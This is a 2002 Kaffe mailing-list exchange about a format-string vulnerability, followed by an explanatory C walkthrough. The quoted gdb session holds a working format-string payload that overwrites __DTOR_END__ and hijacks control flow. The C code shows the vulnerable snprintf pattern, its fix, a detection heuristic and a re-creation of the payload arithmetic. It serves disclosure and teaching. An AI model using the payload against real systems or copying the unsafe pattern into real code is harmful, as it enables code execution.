Kaffe Exploit is almost finished... second warning for format strings issue.

Jim Pick kaffe@rufus.w3.org
Fri, 12 Apr 2002 14:20:05 -0700


Oooh, that's bad.

I just committed a fix.  Thanks for the heads up.

Hopefully it shouldn't hurt anyone, since people shouldn't be using Kaffe to
run untrusted code until we've fully implemented things like the verifier.
I'll cc: the list so that people know about this.

Cheers,

 - Jim

----- Original Message -----
From: "KF" <dotslash@snosoft.com>
To: <jim@kaffe.org>
Sent: Friday, April 12, 2002 8:03 AM
Subject: Kaffe Exploit is almost finished... second warning for format
strings issue.


> 0804b6c8 ? __DTOR_END__
> [itchie@ghetto itchie]$ gdb -q /usr/local/libexec/Kaffe
> (gdb) r  AAAABBBB`perl -e 'print
> "\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> Starting program: /usr/local/libexec/Kaffe AAAABBBB`perl -e 'print
> "\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> java.lang.NoClassDefFoundError: AAAABBBBJHEEEE
>         at java.lang.Class.forName(Class.java:native)
>         at java.lang.Class.forName(Class.java:52)
>
> Program received signal SIGSEGV, Segmentation fault.
> 0xbfffff9a in ?? ()
>
>
> -KF
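The transcript above shows the classic shape of a format-string bug: a string the attacker controls (here a class name that ends up in a NoClassDefFoundError message) is handed to a printf-family function as the format, so `%x` walks the caller's stack and `%hn` writes a running byte count through a pointer it finds there. The following is an added example, not Kaffe's code and not KF's exploit: `format_error_unsafe` and `format_error_safe` are hypothetical stand-ins for the vulnerable and fixed patterns, and `simulate_dtor_overwrite` re-does the arithmetic of KF's payload with the `%hn` targets passed explicitly instead of being pulled from the stack via the `%26$`/`%27$` positional arguments in the original run. The two-halfword layout (high half written first at the +2 address, low half second) assumes the little-endian i386 setup seen in the gdb session, and the `__DTOR_END__` slot is modelled by a local 4-byte array.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable pattern (hypothetical stand-in, not the actual Kaffe code):
 * the attacker-controlled class name is used AS the format string.
 * Every %x in it pops a word off the caller's stack and every %n/%hn
 * writes the byte count so far through a pointer taken from the stack.
 * Compilers flag this with -Wformat-security. */
int format_error_unsafe(const char *classname, char *out, size_t n)
{
    return snprintf(out, n, classname);   /* BUG: user data as format */
}

/* Fixed form: the class name is an argument, never the format. */
int format_error_safe(const char *classname, char *out, size_t n)
{
    return snprintf(out, n, "%s", classname);
}

/* Count the printf conversions an untrusted string would trigger
 * ("%%" is a literal percent sign, not a conversion).  Handy as a
 * guard or a log-scanning heuristic for data that must never reach a
 * printf-family function in format position. */
int count_conversions(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent, skip both characters */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

/* Re-creates the arithmetic of KF's payload with explicit %hn targets.
 * half[] stands in for the 4 bytes at __DTOR_END__ (0x0804b6c8 in the
 * transcript); half[1] plays the byte at +2 (0x0804b6ca) and half[0]
 * the byte at +0.  Returns the 32-bit value the two halfword writes
 * assemble, which is the address the crashed program jumped to. */
uint32_t simulate_dtor_overwrite(void)
{
    uint16_t half[2] = {0, 0};
    size_t cap = 70000;                 /* output is 65434 bytes, keep %hn honest */
    char *buf = malloc(cap);
    if (!buf)
        return 0;
    /* Prefix: "AAAABBBB" (8) + two 4-byte addresses (8) + "EEEE" (4) = 20 bytes,
     * exactly as in the original command line. */
    int written = snprintf(buf, cap,
        "AAAABBBB" "\xca\xb6\x04\x08\xc8\xb6\x04\x08" "EEEE"
        "%49131x%hn%16283x%hn",
        0, (short *)&half[1],   /* 20 + 49131 = 49151 = 0xbfff -> high half */
        0, (short *)&half[0]);  /*    + 16283 = 65434 = 0xff9a -> low half  */
    free(buf);
    if (written != 65434)
        return 0;
    return (uint32_t)half[0] | ((uint32_t)half[1] << 16);
}

int main(void)
{
    char out[64];
    /* Constructed sample class name containing an escaped percent sign. */
    format_error_unsafe("Foo%%Bar", out, sizeof out);
    printf("unsafe: %s\n", out);   /* Foo%Bar : the name was interpreted */
    format_error_safe("Foo%%Bar", out, sizeof out);
    printf("safe:   %s\n", out);   /* Foo%%Bar: passed through verbatim */
    printf("conversions in KF's payload: %d\n",
           count_conversions("AAAABBBBJHEEEE%49131x%26$hn%16283x%27$hn"));
    printf("simulated __DTOR_END__ = 0x%08" PRIx32 "\n", simulate_dtor_overwrite());
    return 0;
}
```

The simulation only reproduces the counting: in the real run the two pointers came from the attacker-supplied bytes on the stack (the `%26$`/`%27$` indices), not from explicit arguments, which is why the fix is to take the name out of format position rather than to try to sanitise it.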